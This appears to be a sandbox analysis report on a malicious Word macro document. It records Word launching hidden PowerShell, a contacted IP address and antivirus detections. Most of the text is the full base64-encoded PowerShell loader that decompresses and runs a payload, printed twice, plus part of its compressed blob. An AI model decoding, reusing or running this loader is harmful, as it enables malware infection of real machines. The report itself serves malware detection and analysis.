cflIEB+H2TBLPSY6TTW90YtNem2PZG+Dj68Wq09NVG1WhtUzTXANgO7NdhFdHvfhTF0wEHX6qSW2WGN9/boZlJpziesbdSa4WrCU/f1rG4YxoWP670dQhb3q73dtDziV20vsmoxNy7s2ho1ELLjxrhp8Q8zK0GOMcbBhqe3b6rZJLCRPbApmQ+vm9Zw2LTQdev2c/3CCIyLyRSH1mRcofPNdBTCvLltDz8YZq3jkwc+3wJwLY5wMAKdwK544Qp06i+R9bLP0wpeWxxZoNOcf0atcLZpOgzWr64rHI1Zf4pRd75rGkZ55tRQ2+STVoCGoI4Da4hReld/qBvlsc/9yav+bGWMp+yNUbeHTjiVORubSP5u2/UP3ry89QZv3nYndBxxdG0Y4xeSM0CawqYuRt4TMvysdfdwkoaYAUmgKx8PZZMnzbzVOpxKC02DS3lNkpgwuNfg5jtSGzHGPdnjoSXD7XLo+fIKuoZhtfLsSFceFfVvvf8ourycQ4RwWPZ8LnVJHIiwaN5XTRPauXlfMyHH30/L5puddvBVlPfBAZlH92zvXpcHqcD8vvV/QpYf3hD+/F9D9k32i9XfgtEs5gn/IP9e8EeY/mHeE0wF6LnQeRg53HrPpZ+T48nbgCwIVH6VP/JVbpCJ8z68JJyd/gMBS99GLwoAAA=='))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
parent_process	winword.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwAnAEgANABzAEkAQQBBAFAAdABOADIARQBDAEEANwBWAFcAYQBXAC8AYgBPAEIARAA5AG4AQQBEADUARAAwAEoAaABRAEIATABxAFcAUABMAFIASQB3AEUASwBMAEMAVwBmAHIAUQAvAFoAUwBuAHoAVwBLAEIAaQBKAGwAaABoAFQAbwBpAHQAUgBjAFoAeAB1AC8ALwBzAE8AYgBUAGwATgB0ADIAbgBSAEwAcgBDAEMARAAzAEkANABNADUAeAA1ADgAegBqAFUASwBvAHMAOQBRAFgAbQBzADQASQBIAHkANQBlAHoAMAB4AE0ARQBKAGoAaABTAHQANABOADgAWABsAGMASgB0AFIAKwBnAG4ASgB5AEEAdABCAEsAKwBWAGQANABxADIAUQBKAHQATgBuAFUAZQBZAHgAcwB2AEwAUwB6AHQATABFAGgASwBMAHcANwB6AFUASQBnAEsAbABLAFkAbAB1AEcAQwBXAHAAcABpAHQALwBLADUATwBRAEoATwBSADgAYwBIAE4ATABQAEsARgA4AFUAUQBxAGYAUwBpADMARwBiAHoARABMADEAWABZADIAOQBrAEsAaQBuAEsAUABZAGwAMgB0AGQANwBtAEUAWgBSADgAbgBkAE0AQwBvADAAOQBlAE4ASABWAFYAKwBjAGwANQBlAGwAeAB1AGMATQBzADEAUgBUADMAVgAwAHEAUwBGAFQAeQBHAFYATgAxADUAYQBzAHUATgA3AHoAYQBiAFkAaQBtADkAcQBpAFgAOABKAFMAdgBSAEcAbABDADQAMgBxAGwAZABCADIAbgBlAEUAWAA2ADQATwAyAE8AOQBJAGcASQB1AFoAKwBxAE8AdQBRAEEAbgA0AFMASQBMAEkAawBWAHkARQBhAGEASAB4AFkAMQBGAFkAWgBPAHcAagAzAGsAKwB3AGwASgBVADcAVwBvAEwASwBUAGoAeABYAEwANQBsADcAYgBJAGQAeAAxAGwAcwBhAEEAUgBLAFgAVgBpAFEAUgBLACsAYwBVAGwAeQBSAHoAMgBTAGwAdABvADQAOQBoAGsAWgBrAGQAVQBTAHIARgB5AFIAMABEAGgAWQA2AGoAcQBvADMAZgBFADEAMABRAHAAeAB4AGwAaABSACsAUgBNADMAVwBwADkAcwBqADUAagA5AHIAcABIADIAMQBBAGkAMABIAEoASABvAFIAUwBqAGgARAAxAG4AMgB1AEoAOAB4AGMAcgBCAFQAbgB3AGsAVABpAHEANwBEAGsAeABjAGUATQBQAHQANgBkAG4AcAAyAHUAbgBwAGsAeQBLAHUAbgBEAEkASABSAHkAVwBJAC8ASgBoAEMAWAA1AHYAQwBVADcAcgBYAGUASwBXAFoAUgA2AGMARQBlAFcAUABCAGsAQgA5AFAAQwBWAFoASQBSAGYAZgBtAEkAcQBsAEkAZwBaAHEALwA0AGMALwBQAHkAVQBSAGMAMABIADIANQBBAHMAQgBoAHoANgBpAC8AQgBJAEsAOQBpAHcAVgA5AC8AawB1AEsAZgBrADcARgBPAFYAagBRAG0AOQBWADIATQBJACsAbwBkACsAYQBZADkAaAB5ADEAWgBNAGIATABQAHIAbgBSAFUANgAwAE4ARQBtAHAAbwB2AEUATAA5AE8ARwBBAG0AdwBrAEgAagBKAEUAdgA5AGcAMQBvAGkAbwBlAEwAUwAxAE0AcwBwADgAawBpAEEAUAA2AHAATgBDAFYARgBBADYALwBmAHQAZwBEAGkAWABRADEARQA3AGMASQB4AEgAZwBjADUAZwBEADUAdwBvAHIAWQBEAGsANQBhAHUAZgBNADMAaAAxADMAbAAzAE4AUQBVAG0AMgBHADAANwBTAG8ATwBCAGsAYwBNADYAKwBvAHUAQQBRAHoANABoAGMAVgBGAEsAYwAwAFgAMABLAFoANABQAHUAaAArAGkAMwBjAFgAcwBZAEUAOQBYAEEAcQBqAHUANgBXAGUAZwA1AGoAdgBwADMATgA0ADEAUQBrAG0AUQBjAFYAZwA5AFMAdgAzAEEAMwB4AEsARwBZAFMAaQBhAEwAUwBwAGoANgB4AGQAaQA0AE4AagB0AHUAcQB6ACsASgBnAFkAOABhAEEALwBlAEQAcABEAHUAbwBBAEUAcABtAC8ASwB5AFEAUABFAG8AaABRADEAbAB3AHYAdQBVAFIAMABvAGcAMABqAEUAYQBqAHMAVAAzAHUAVAA0AFEARABPAGQAawA3AHgAUABXADkAdwBRAEgAegAxAFgALwBFAGQATwBYAHcAZwByAEEAVABpAGkATQBDAFQANgBLAEMANgBMAHUATwBpAHEASQB4AHAASQBxAEIAbgBTAEYAQQBmAGIAdgA3AFQAMQBrADkAYQBoAFEAegBDAFQAawBoAGUAQQArADEANABLAEIAYgBXAFQAawBnAHkARgB6AGcAbQBEAFUAdQB5AE0AWQBkAGsARAAwAEEAaQBJAFAAbABtAHcAaQBNAEwAcAArAFIAMQA3AGQAQQBZAHQAQgBmAEcAZwBEAG8ASQBuAGwAbQA5ADcAVgBJAHkAWAB0AE4AeQBaAHcAdgBmAEgAbgB5AHYAZQA2AHUAWABYAFkAOABHAGoAagBCADUAMQBQAFAAcwAxAEcAawAxADMAeQBLADYARABiAGIAZQAyAHoANwB5AC8AUABjACsAdQBYAEQASABOAGUARQAyAE8AcwBKADIAVQBIAHQASQBUAGEAcwBXAGUAcABaADUASgBjAGYAbABJAEUAQgArAEgAMgBUAEIATABQAFMAWQA2AFQAVABXADkAMABZAHQATgBlAG0AMgBQAFoARwArAEQAagA2ADgAVwBxADAAOQBOAFYARwAxAFcAaAB0AFUAegBUAFgAQQBOAGcATwA3AE4AZABoAEYAZABIAHYAZgBoAFQARgAwAHcARQBIAFgANgBxAFMAVwAyAFcARwBOADkALwBiAG8AWgBsAEoAcAB6AGkAZQBzAGIAZABTAGEANABXAHIAQwBVAC8AZgAxAHIARwA0AFkAeABvAFcAUAA2ADcAMABkAFEAaABiADMAcQA3ADMAZAB0AEQAegBpAFYAMgAwAHYAcwBtAG8AeABOAHkANwBzADIAaABvADEARQBMAEwAagB4AHIAaABwADgAUQA4AHoASwAwAEcATwBNAGMAYgBCAGgAcQBlADMAYgA2AHIAWgBKAEwAQwBSAFAAYgBBAHAAbQBRACsAdgBtADkAWgB3ADIATABUAFEAZABlAHYAMgBjAC8AMwBDAEMASQB5AEwAeQBSAFMASAAxAG0AUgBjAG8AZgBQAE4AZABCAFQAQwB2AEwAbAB0AEQAegA4AFkAWgBxADMAagBrAHcAYwArADMAdwBKAHcATABZADUAdwBNAEEASwBkAHcASwA1ADQANABRAHAAMAA2AGkAKwBSADkAYgBMAFAAMAB3AHAAZQBXAHgAeABaAG8ATgBPAGMAZgAwAGEAdABjAEwAWgBwAE8AZwB6AFcAcgA2ADQAcgBIAEkAMQBaAGYANABwAFIAZAA3ADUAcgBHAGsAWgA1ADUAdABSAFEAMgArAFMAVABWAG8AQwBHAG8ASQA0AEQAYQA0AGgAUgBlAGwAZAAvAHEAQgB2AGwAcwBjAC8AOQB5AGEAdgArAGIARwBXAE0AcAArAHkATgBVAGIAZQBIAFQAagBpAFYATwBSAHUAYgBTAFAANQB1ADIALwBVAFAAMwByAHkAOAA5AFEAWgB2ADMAbgBZAG4AZABCAHgAeABkAEcAMABZADQAeABlAFMATQAwAEMAYQB3AHEAWQB1AFIAdAA0AFQATQB2AHkAcwBkAGYAZAB3AGsAbwBhAFkAQQBVAG0AZwBLAHgAOABQAFoAWgBNAG4AegBiAHoAVgBPAHAAeABLAEMAMAAyAEQAUwAzAGwATgBrAHAAZwB3AHUATgBmAGcANQBqAHQAUwBHAHoASABHAFAAZABuAGoAbwBTAFgARAA3AFgATABvACsAZgBJAEsAdQBvAFoAaAB0AGYATABzAFMARgBjAGUARgBmAFYAdgB2AGYAOABvAHUAcgB5AGMAUQA0AFIAdwBXAFAAWgA4AEwAbgBWAEoASABJAGkAdwBhAE4ANQBYAFQAUgBQAGEAdQBYAGwAZgBNAHkASABIADMAMAAvAEwANQBwAHUAZABkAHYAQgBWAGwAUABmAEIAQQBaAGwASAA5ADIAegB2AFgAcABjAEgAcQBjAEQAOAB2AHYAVgAvAFEAcABZAGYAMwBoAEQAKwAvAEYAOQBEADkAawAzADIAaQA5AFgAZgBnAHQARQBzADUAZwBuAC8ASQBQADkAZQA4AEUAZQBZAC8AbQBIAGUARQAwAHcARgA2AEwAbgBRAGUAUgBnADUAMwBIAHIAUABwAFoAKwBUADQAOABuAGIAZwBDAHcASQBWAEgANgBWAFAALwBKAFYAYgBwAEMASgA4AHoANgA4AEoASgB5AGQALwBnAE0AQgBTADkAOQBHAEwAdwBvAEEAQQBBAD0APQAnACcAKQApACkALABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQApACkAJwA7ACQAcwAuAFUAcwBlAFMAaABlAGwAbABFAHgAZQBjAHUAdABlAD0AJABmAGEAbABzAGUAOwAkAHMALgBSAGUAZABpAHIAZQBjAHQAUwB0AGEAbgBkAGEAcgBkAE8AdQB0AHAAdQB0AD0AJAB0AHIAdQBlADsAJABzAC4AVwBpAG4AZABvAHcAUwB0AHkAbABlAD0AJwBIAGkAZABkAGUAbgAnADsAJABzAC4AQwByAGUAYQB0AGUATgBvAFcAaQBuAGQAbwB3AD0AJAB0AHIAdQBlADsAJABwAD0AWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAUwB0AGEAcgB0ACgAJABzACkAOwA=
parent_process	winword.exe	martian_process	powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwAnAEgANABzAEkAQQBBAFAAdABOADIARQBDAEEANwBWAFcAYQBXAC8AYgBPAEIARAA5AG4AQQBEADUARAAwAEoAaABRAEIATABxAFcAUABMAFIASQB3AEUASwBMAEMAVwBmAHIAUQAvAFoAUwBuAHoAVwBLAEIAaQBKAGwAaABoAFQAbwBpAHQAUgBjAFoAeAB1AC8ALwBzAE8AYgBUAGwATgB0ADIAbgBSAEwAcgBDAEMARAAzAEkANABNADUAeAA1ADgAegBqAFUASwBvAHMAOQBRAFgAbQBzADQASQBIAHkANQBlAHoAMAB4AE0ARQBKAGoAaABTAHQANABOADgAWABsAGMASgB0AFIAKwBnAG4ASgB5AEEAdABCAEsAKwBWAGQANABxADIAUQBKAHQATgBuAFUAZQBZAHgAcwB2AEwAUwB6AHQATABFAGgASwBMAHcANwB6AFUASQBnAEsAbABLAFkAbAB1AEcAQwBXAHAAcABpAHQALwBLADUATwBRAEoATwBSADgAYwBIAE4ATABQAEsARgA4AFUAUQBxAGYAUwBpADMARwBiAHoARABMADEAWABZADIAOQBrAEsAaQBuAEsAUABZAGwAMgB0AGQANwBtAEUAWgBSADgAbgBkAE0AQwBvADAAOQBlAE4ASABWAFYAKwBjAGwANQBlAGwAeAB1AGMATQBzADEAUgBUADMAVgAwAHEAUwBGAFQAeQBHAFYATgAxADUAYQBzAHUATgA3AHoAYQBiAFkAaQBtADkAcQBpAFgAOABKAFMAdgBSAEcAbABDADQAMgBxAGwAZABCADIAbgBlAEUAWAA2ADQATwAyAE8AOQBJAGcASQB1AFoAKwBxAE8AdQBRAEEAbgA0AFMASQBMAEkAawBWAHkARQBhAGEASAB4AFkAMQBGAFkAWgBPAHcAagAzAGsAKwB3AGwASgBVADcAVwBvAEwASwBUAGoAeABYAEwANQBsADcAYgBJAGQAeAAxAGwAcwBhAEEAUgBLAFgAVgBpAFEAUgBLACsAYwBVAGwAeQBSAHoAMgBTAGwAdABvADQAOQBoAGsAWgBrAGQAVQBTAHIARgB5AFIAMABEAGgAWQA2AGoAcQBvADMAZgBFADEAMABRAHAAeAB4AGwAaABSACsAUgBNADMAVwBwADkAcwBqADUAagA5AHIAcABIADIAMQBBAGkAMABIAEoASABvAFIAUwBqAGgARAAxAG4AMgB1AEoAOAB4AGMAcgBCAFQAbgB3AGsAVABpAHEANwBEAGsAeABjAGUATQBQAHQANgBkAG4AcAAyAHUAbgBwAGsAeQBLAHUAbgBEAEkASABSAHkAVwBJAC8ASgBoAEMAWAA1AHYAQwBVADcAcgBYAGUASwBXAFoAUgA2AGMARQBlAFcAUABCAGsAQgA5AFAAQwBWAFoASQBSAGYAZgBtAEkAcQBsAEkAZwBaAHEALwA0AGMALwBQAHkAVQBSAGMAMABIADIANQBBAHMAQgBoAHoANgBpAC8AQgBJAEsAOQBpAHcAVgA5AC8AawB1AEsAZgBrADcARgBPAFYAagBRAG0AOQBWADIATQBJACsAbwBkACsAYQBZADkAaAB5ADEAWgBNAGIATABQAHIAbgBSAFUANgAwAE4ARQBtAHAAbwB2AEUATAA5AE8ARwBBAG0AdwBrAEgAagBKAEUAdgA5AGcAMQBvAGkAbwBlAEwAUwAxAE0AcwBwADgAawBpAEEAUAA2AHAATgBDAFYARgBBADYALwBmAHQAZwBEAGkAWABRADEARQA3AGMASQB4AEgAZwBjADUAZwBEADUAdwBvAHIAWQBEAGsANQBhAHUAZgBNADMAaAAxADMAbAAzAE4AUQBVAG0AMgBHADAANwBTAG8ATwBCAGsAYwBNADYAKwBvAHUAQQBRAHoANABoAGMAVgBGAEsAYwAwAFgAMABLAFoANABQAHUAaAArAGkAMwBjAFgAcwBZAEUAOQBYAEEAcQBqAHUANgBXAGUAZwA1AGoAdgBwADMATgA0ADEAUQBrAG0AUQBjAFYAZwA5AFMAdgAzAEEAMwB4AEsARwBZAFMAaQBhAEwAUwBwAGoANgB4AGQAaQA0AE4AagB0AHUAcQB6ACsASgBnAFkAOABhAEEALwBlAEQAcABEAHUAbwBBAEUAcABtAC8ASwB5AFEAUABFAG8AaABRADEAbAB3AHYAdQBVAFIAMABvAGcAMABqAEUAYQBqAHMAVAAzAHUAVAA0AFEARABPAGQAawA3AHgAUABXADkAdwBRAEgAegAxAFgALwBFAGQATwBYAHcAZwByAEEAVABpAGkATQBDAFQANgBLAEMANgBMAHUATwBpAHEASQB4AHAASQBxAEIAbgBTAEYAQQBmAGIAdgA3AFQAMQBrADkAYQBoAFEAegBDAFQAawBoAGUAQQArADEANABLAEIAYgBXAFQAawBnAHkARgB6AGcAbQBEAFUAdQB5AE0AWQBkAGsARAAwAEEAaQBJAFAAbABtAHcAaQBNAEwAcAArAFIAMQA3AGQAQQBZAHQAQgBmAEcAZwBEAG8ASQBuAGwAbQA5ADcAVgBJAHkAWAB0AE4AeQBaAHcAdgBmAEgAbgB5AHYAZQA2AHUAWABYAFkAOABHAGoAagBCADUAMQBQAFAAcwAxAEcAawAxADMAeQBLADYARABiAGIAZQAyAHoANwB5AC8AUABjACsAdQBYAEQASABOAGUARQAyAE8AcwBKADIAVQBIAHQASQBUAGEAcwBXAGUAcABaADUASgBjAGYAbABJAEUAQgArAEgAMgBUAEIATABQAFMAWQA2AFQAVABXADkAMABZAHQATgBlAG0AMgBQAFoARwArAEQAagA2ADgAVwBxADAAOQBOAFYARwAxAFcAaAB0AFUAegBUAFgAQQBOAGcATwA3AE4AZABoAEYAZABIAHYAZgBoAFQARgAwAHcARQBIAFgANgBxAFMAVwAyAFcARwBOADkALwBiAG8AWgBsAEoAcAB6AGkAZQBzAGIAZABTAGEANABXAHIAQwBVAC8AZgAxAHIARwA0AFkAeABvAFcAUAA2ADcAMABkAFEAaABiADMAcQA3ADMAZAB0AEQAegBpAFYAMgAwAHYAcwBtAG8AeABOAHkANwBzADIAaABvADEARQBMAEwAagB4AHIAaABwADgAUQA4AHoASwAwAEcATwBNAGMAYgBCAGgAcQBlADMAYgA2AHIAWgBKAEwAQwBSAFAAYgBBAHAAbQBRACsAdgBtADkAWgB3ADIATABUAFEAZABlAHYAMgBjAC8AMwBDAEMASQB5AEwAeQBSAFMASAAxAG0AUgBjAG8AZgBQAE4AZABCAFQAQwB2AEwAbAB0AEQAegA4AFkAWgBxADMAagBrAHcAYwArADMAdwBKAHcATABZADUAdwBNAEEASwBkAHcASwA1ADQANABRAHAAMAA2AGkAKwBSADkAYgBMAFAAMAB3AHAAZQBXAHgAeABaAG8ATgBPAGMAZgAwAGEAdABjAEwAWgBwAE8AZwB6AFcAcgA2ADQAcgBIAEkAMQBaAGYANABwAFIAZAA3ADUAcgBHAGsAWgA1ADUAdABSAFEAMgArAFMAVABWAG8AQwBHAG8ASQA0AEQAYQA0AGgAUgBlAGwAZAAvAHEAQgB2AGwAcwBjAC8AOQB5AGEAdgArAGIARwBXAE0AcAArAHkATgBVAGIAZQBIAFQAagBpAFYATwBSAHUAYgBTAFAANQB1ADIALwBVAFAAMwByAHkAOAA5AFEAWgB2ADMAbgBZAG4AZABCAHgAeABkAEcAMABZADQAeABlAFMATQAwAEMAYQB3AHEAWQB1AFIAdAA0AFQATQB2AHkAcwBkAGYAZAB3AGsAbwBhAFkAQQBVAG0AZwBLAHgAOABQAFoAWgBNAG4AegBiAHoAVgBPAHAAeABLAEMAMAAyAEQAUwAzAGwATgBrAHAAZwB3AHUATgBmAGcANQBqAHQAUwBHAHoASABHAFAAZABuAGoAbwBTAFgARAA3AFgATABvACsAZgBJAEsAdQBvAFoAaAB0AGYATABzAFMARgBjAGUARgBmAFYAdgB2AGYAOABvAHUAcgB5AGMAUQA0AFIAdwBXAFAAWgA4AEwAbgBWAEoASABJAGkAdwBhAE4ANQBYAFQAUgBQAGEAdQBYAGwAZgBNAHkASABIADMAMAAvAEwANQBwAHUAZABkAHYAQgBWAGwAUABmAEIAQQBaAGwASAA5ADIAegB2AFgAcABjAEgAcQBjAEQAOAB2AHYAVgAvAFEAcABZAGYAMwBoAEQAKwAvAEYAOQBEADkAawAzADIAaQA5AFgAZgBnAHQARQBzADUAZwBuAC8ASQBQADkAZQA4AEUAZQBZAC8AbQBIAGUARQAwAHcARgA2AEwAbgBRAGUAUgBnADUAMwBIAHIAUABwAFoAKwBUADQAOABuAGIAZwBDAHcASQBWAEgANgBWAFAALwBKAFYAYgBwAEMASgA4AHoANgA4AEoASgB5AGQALwBnAE0AQgBTADkAOQBHAEwAdwBvAEEAQQBBAD0APQAnACcAKQApACkALABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQApACkAJwA7ACQAcwAuAFUAcwBlAFMAaABlAGwAbABFAHgAZQBjAHUAdABlAD0AJABmAGEAbABzAGUAOwAkAHMALgBSAGUAZABpAHIAZQBjAHQAUwB0AGEAbgBkAGEAcgBkAE8AdQB0AHAAdQB0AD0AJAB0AHIAdQBlADsAJABzAC4AVwBpAG4AZABvAHcAUwB0AHkAbABlAD0AJwBIAGkAZABkAGUAbgAnADsAJABzAC4AQwByAGUAYQB0AGUATgBvAFcAaQBuAGQAbwB3AD0AJAB0AHIAdQBlADsAJABwAD0AWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAUwB0AGEAcgB0ACgAJABzACkAOwA=

Creates a suspicious Powershell process (6 events)

option	-nop	value	Does not load current user profile
option	-w hidden	value	Attempts to execute command with a hidden window
option	-nop	value	Does not load current user profile
option	-w hidden	value	Attempts to execute command with a hidden window
option	-nop	value	Does not load current user profile
option	-w hidden	value	Attempts to execute command with a hidden window

Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 event)

dead_host

178.62.247.185:9090

File has been identified by 34 AntiVirus engines on VirusTotal as malicious (34 events)

Lionic	Trojan.MSOffice.SAgent.4!c
Elastic	malicious (high confidence)
ClamAV	Win.Trojan.PowerShell-8
CAT-QuickHeal	W97M.Downloader.36753
ALYac	VB.Heur2.PwShell.2.8672C14A.Gen
Sangfor	Malware.Generic-Macro.Save.092df8c2
Arcabit	HEUR.VBA.Trojan.e
Symantec	Downloader
ESET-NOD32	PowerShell/Rozena.AJ
Avast	VBS:Agent-BUK [Trj]
Cynet	Malicious (score: 99)
Kaspersky	HEUR:Trojan.MSOffice.SAgent.gen
BitDefender	VB.Heur2.PwShell.2.8672C14A.Gen
NANO-Antivirus	Trojan.Macro.Downloader.fqlyhy
ViRobot	DOC.Z.Agent.87040.SB
MicroWorld-eScan	VB.Heur2.PwShell.2.8672C14A.Gen
Tencent	Heur.Macro.Generic.a.1fd5e5d1
Ad-Aware	VB.Heur2.PwShell.2.8672C14A.Gen
Emsisoft	VB.Heur2.PwShell.2.8672C14A.Gen (B)
DrWeb	modification of W97M.Suspicious.1
McAfee-GW-Edition	BehavesLike.OLE2.Downloader.mg
FireEye	VB.Heur2.PwShell.2.8672C14A.Gen
Ikarus	Trojan.PowerShell.Rozena
Avira	HEUR/Macro.Downloader.MRQR.Gen
MAX	malware (ai score=87)
Microsoft	TrojanDownloader:PowerShell/Bynoco!MTB
ZoneAlarm	HEUR:Trojan.MSOffice.SAgent.gen
GData	VB.Heur2.PwShell.2.8672C14A.Gen
McAfee	RDN/Generic Downloader.x
TACHYON	Suspicious/W97M.Obfus.Gen.2
Rising	Heur.Macro.powershell.a (CLASSIC)
SentinelOne	Static AI - Suspicious OLE
Fortinet	VBA/Agent.BUK!tr
AVG	VBS:Agent-BUK [Trj]

The process winword.exe wrote an executable file to disk which it then attempted to execute (1 event)

file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

detalhes_atualizacao.doc

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All